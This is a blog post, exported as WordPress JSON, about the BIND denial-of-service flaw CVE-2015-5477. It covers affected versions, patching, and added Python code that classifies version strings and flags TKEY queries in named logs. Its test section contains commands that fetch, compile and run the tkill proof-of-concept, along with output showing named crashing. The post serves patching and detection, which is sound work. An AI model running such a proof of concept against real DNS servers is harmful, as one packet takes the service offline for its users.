{"id":417,"date":"2015-08-08T10:30:59","date_gmt":"2015-08-08T02:30:59","guid":{"rendered":"http:\/\/www.ipcpu.com\/?p=417"},"modified":"2015-08-08T10:30:59","modified_gmt":"2015-08-08T02:30:59","slug":"cve-2015-5477","status":"publish","type":"post","link":"https:\/\/c.ipcpu.com\/2015\/08\/cve-2015-5477\/","title":{"rendered":"DNS server software BIND hit by a serious DoS vulnerability (CVE-2015-5477)"},"content":{"rendered":"

DNS server software BIND hit by a serious DoS vulnerability (CVE-2015-5477)<\/p>\n

Vulnerability description<\/h3>\n

ISC recently published an advisory for CVE-2015-5477. An error in the way named handles TKEY queries lets a single crafted packet trigger a REQUIRE assertion failure, so the named process exits; both recursive and authoritative servers are affected, and every BIND 9 release before the fixed versions is vulnerable. An attacker who can reach the server on port 53 can therefore knock the DNS service offline with one packet, no authentication required.<\/p>\n

Affected versions<\/h3>\n

Source builds: 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1, 9.10.0 through 9.10.2-P2 (the fix ships in 9.9.7-P2 and 9.10.2-P3; the 9.8 and older branches are end-of-life upstream and get the fix only through distribution packages)
Red Hat AS6: versions older than bind-9.8.2-0.37.rc1.el6_7.2
Red Hat AS5: versions older than bind-9.3.6-25.P1.el5_11.3<\/p>\n
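The ranges above can be turned into a safe pre-check that crashes nothing. The following is an added example, not code from this post or from ISC: it takes a version.bind string (what `dig @server version.bind CHAOS TXT` or `rndc status` reports) and classifies it. For Red Hat builds it ignores the upstream prefix (9.8.2rc1, 9.3.6-P1 stay the same after the backported fix) and instead compares the package version-release after `RedHat-` against the two fixed packages listed above, using a simplified rpm-style version comparison. Upstream strings are compared against 9.9.7-P2 and 9.10.2-P3; the 9.11.0pre-alpha snapshot seen later in this post, and anything else that is not a plain release, is reported as unknown on purpose. Two caveats: version.bind can be hidden or changed with the `version` option in named.conf, so `rpm -q bind` on the host is the authoritative answer, and unknown means ask the vendor, not safe.<\/p>\n

```python
import re

# Upstream releases that contain the fix (from the ISC advisory for CVE-2015-5477).
UPSTREAM_FIXED = {(9, 9): '9.9.7-P2', (9, 10): '9.10.2-P3'}
# Fixed Red Hat packages as listed in this post, as (version, release).
# Assumption: only RHEL/CentOS 5 and 6 are covered; other distributions need their own rows.
REDHAT_FIXED = {'el5': ('9.3.6', '25.P1.el5_11.3'),
                'el6': ('9.8.2', '0.37.rc1.el6_7.2')}

_SEGMENT = re.compile(r'\d+|[A-Za-z]+')

def rpmvercmp(a, b):
    '''Compare two version strings the way rpm does (simplified: no tilde/caret):
    split into digit runs and letter runs, compare digit runs numerically and
    letter runs lexically, a digit run beats a letter run, and when one string
    runs out first the longer one is newer. Returns -1, 0 or 1.'''
    sa, sb = _SEGMENT.findall(a), _SEGMENT.findall(b)
    for x, y in zip(sa, sb):
        if x == y:
            continue
        if x.isdigit() and y.isdigit():
            if int(x) != int(y):
                return 1 if int(x) > int(y) else -1
        elif x.isdigit() != y.isdigit():
            return 1 if x.isdigit() else -1
        else:
            return 1 if x > y else -1
    if len(sa) == len(sb):
        return 0
    return 1 if len(sa) > len(sb) else -1

def classify(version_bind):
    '''Return 'fixed', 'vulnerable' or 'unknown' for a version.bind string.'''
    # Distribution build: only the package version-release after 'RedHat-' tells
    # whether the backported fix is present.
    m = re.search(r'RedHat-(\d[\d.]*)-([\w.]+)', version_bind)
    if m:
        ver, rel = m.group(1), m.group(2)
        dist = re.search(r'\.(el\d+)', rel)
        if not dist or dist.group(1) not in REDHAT_FIXED:
            return 'unknown'
        fixed_ver, fixed_rel = REDHAT_FIXED[dist.group(1)]
        cmp = rpmvercmp(ver, fixed_ver) or rpmvercmp(rel, fixed_rel)
        return 'fixed' if cmp >= 0 else 'vulnerable'
    # Plain upstream release: 9.x.y with an optional -Pn patch level.
    m = re.fullmatch(r'(\d+)\.(\d+)\.(\d+)(?:-P\d+)?', version_bind)
    if not m:
        return 'unknown'      # alpha/beta/rc/pre-alpha snapshots, hidden or custom strings
    major, minor = int(m.group(1)), int(m.group(2))
    if major != 9 or not 1 <= minor <= 10:
        return 'unknown'
    if minor < 9:
        return 'vulnerable'   # 9.1 - 9.8: every upstream release is affected, none is fixed
    fixed = UPSTREAM_FIXED[(major, minor)]
    return 'fixed' if rpmvercmp(version_bind, fixed) >= 0 else 'vulnerable'

if __name__ == '__main__':
    # Constructed inputs: the two strings seen in this post plus a few neighbours.
    for v in ('9.11.0pre-alpha', '9.3.6-P1-RedHat-9.3.6-25.P1.el5_11.3',
              '9.8.2rc1-RedHat-9.8.2-0.30.rc1.el6_6.3', '9.9.7-P1', '9.9.7-P2',
              '9.10.2-P2', '9.10.2-P3', '9.8.4'):
        print(f'{v:45} {classify(v)}')
```

Run it against the output of `rndc status` or a version.bind query on each server before and after the update; a fleet-wide sweep with this check is harmless, unlike the PoC below, which kills every vulnerable daemon it touches.<\/p>\n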

Vulnerability test<\/h3>\n

Very dangerous, do not run this against a production service: a vulnerable named daemon will crash.
A. Test method<\/p>\n

[@ ~]# wget http:\/\/NOTVALID\/script\/tkill.c
[@ ~]# gcc -g -o tkill tkill.c
[@ ~]# chmod a+x tkill
[@ ~]# .\/tkill localhost
# If named crashes, the server is vulnerable; if the tool reports not vulnerable, the fix is in place.

B. Test output<\/p>\n

[@ ~]# .\/tkill localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: \"9.11.0pre-alpha\"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed

A check confirmed that the named process had crashed. Note that localhost resolved to both ::1 and 127.0.0.1: the first packet, sent to ::1, killed the daemon, which is why the second probe against 127.0.0.1 could not even fetch the version string.<\/p>\n

C. Service log<\/p>\n

Aug 4 15:32:48 dns named[2717]: client a.b.c.d#42212 (foo.bar): view north_america: query: foo.bar ANY TKEY + (x.y.z.zz)
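The query-log line above (client and destination addresses anonymized as a.b.c.d and x.y.z.zz) is the only trace a vulnerable server leaves before it dies, and the tell-tale is the TKEY query type. Below is an added example, not part of this post and not an ISC tool: it parses named query-log lines, flags every TKEY query with its client, and ties the generic "exiting (due to assertion failure)" message that named writes when an assertion fires to the most recent TKEY client. The log lines are constructed for this example; the TKEY line mirrors the anonymized one above, the others are plausible neighbours. Query logging has to be on (`querylog yes;` in options, or `rndc querylog`) for any of this to exist, and because one packet is enough this is early warning and forensics only: ISC published no workaround, so patching is the fix.<\/p>\n

```python
import re
from collections import Counter

# Constructed sample (not real traffic) in named's query-log format: one ordinary
# A lookup, the anonymized TKEY line from the post, a TKEY query in the view-less
# format, and the generic line named writes when it exits on an assertion.
SAMPLE_LOG = '''\
Aug  4 15:32:40 dns named[2717]: client 192.0.2.10#53211 (www.example.com): view north_america: query: www.example.com IN A + (198.51.100.1)
Aug  4 15:32:48 dns named[2717]: client a.b.c.d#42212 (foo.bar): view north_america: query: foo.bar ANY TKEY + (x.y.z.zz)
Aug  4 15:32:49 dns named[2717]: client 2001:db8::1#4242 (foo.bar): query: foo.bar IN TKEY + (x.y.z.zz)
Aug  4 15:32:49 dns named[2717]: exiting (due to assertion failure)
'''

# "client IP#port [(qname)]: [view NAME: ]query: QNAME CLASS TYPE FLAGS"; the
# "(qname)" and "view" parts are optional so older formats and single-view
# servers parse as well.
QUERY_RE = re.compile(
    r'named\[(?P<pid>\d+)\]: client (?P<client>[^#\s]+)#(?P<port>\d+)'
    r'(?: \([^)]*\))?: (?:view (?P<view>[^:]+): )?'
    r'query: (?P<qname>\S+) (?P<qclass>\S+) (?P<qtype>\S+) (?P<flags>\S+)')
ASSERT_RE = re.compile(r'named\[(?P<pid>\d+)\]: exiting \(due to assertion failure\)')

def parse_query(line):
    '''Return the fields of a named query-log line as a dict, or None.'''
    m = QUERY_RE.search(line)
    return m.groupdict() if m else None

def scan(log_text):
    '''Flag TKEY queries and named assertion exits.

    Returns (alerts, tkey_per_client). TKEY (RFC 2930) is only used to set up
    TSIG keys, e.g. for GSS-TSIG dynamic update, so on a plain resolver or
    authoritative server any TKEY query deserves a look; a TKEY query followed
    by an assertion exit is what a successful CVE-2015-5477 attack looks like.'''
    alerts, per_client, last_tkey_client = [], Counter(), None
    for line in log_text.splitlines():
        q = parse_query(line)
        if q is not None:
            if q['qtype'].upper() == 'TKEY':
                per_client[q['client']] += 1
                last_tkey_client = q['client']
                alerts.append({'kind': 'tkey_query', 'client': q['client'],
                               'qname': q['qname'], 'qclass': q['qclass'],
                               'view': q['view']})
            continue
        if ASSERT_RE.search(line):
            alerts.append({'kind': 'assertion_exit',
                           'client': last_tkey_client or 'unknown'})
    return alerts, per_client

if __name__ == '__main__':
    alerts, per_client = scan(SAMPLE_LOG)
    for a in alerts:
        print(a)
    print('TKEY queries per client:', dict(per_client))
```

Feed it the named query log (or the syslog stream that carries it); a server that legitimately uses GSS-TSIG will show TKEY from its known update clients only, so anything else, and any TKEY immediately followed by the assertion exit, should page someone and trigger the version check.<\/p>\n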

Solution<\/h3>\n

Upgrade to the latest version; a hand-compiled install can also be patched and rebuilt.<\/p>\n

ISC's website does not appear to offer a standalone patch file: the fix ships as the new releases (9.9.7-P2 and 9.10.2-P3). For a branch ISC no longer maintains, such as a hand-built 9.8 or 9.3, the backported patch can be pulled out of the srpm files on Red Hat's FTP site.<\/p>\n

[@ ~]# yum update bind

Test after the update (version.bind now reports the fixed el5 package, and the PoC gets an answer back instead of a timeout)<\/p>\n

[@ ~]# .\/tkill localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] 127.0.0.1: Probing...
[+] Querying version...
[+] 127.0.0.1: \"9.3.6-P1-RedHat-9.3.6-25.P1.el5_11.3\"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[-] 127.0.0.1: got response, so probably not vulnerable

Related links<\/h3>\n

http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2015-5477
http:\/\/www.isc.org\/downloads
https:\/\/ring0.me\/2015\/08\/exploit-dns-server-with-one-packet\/<\/p>\n

Please credit when reprinting: IPCPU-\u7f51\u7edc\u4e4b\u8def » DNS server software BIND hit by a serious DoS vulnerability (CVE-2015-5477)<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,13],"tags":[35,15,36],"_links":{"self":[{"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/posts\/417"}],"collection":[{"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/comments?post=417"}],"version-history":[{"count":0,"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/posts\/417\/revisions"}],"wp:attachment":[{"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/media?parent=417"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/categories?post=417"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/tags?post=417"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}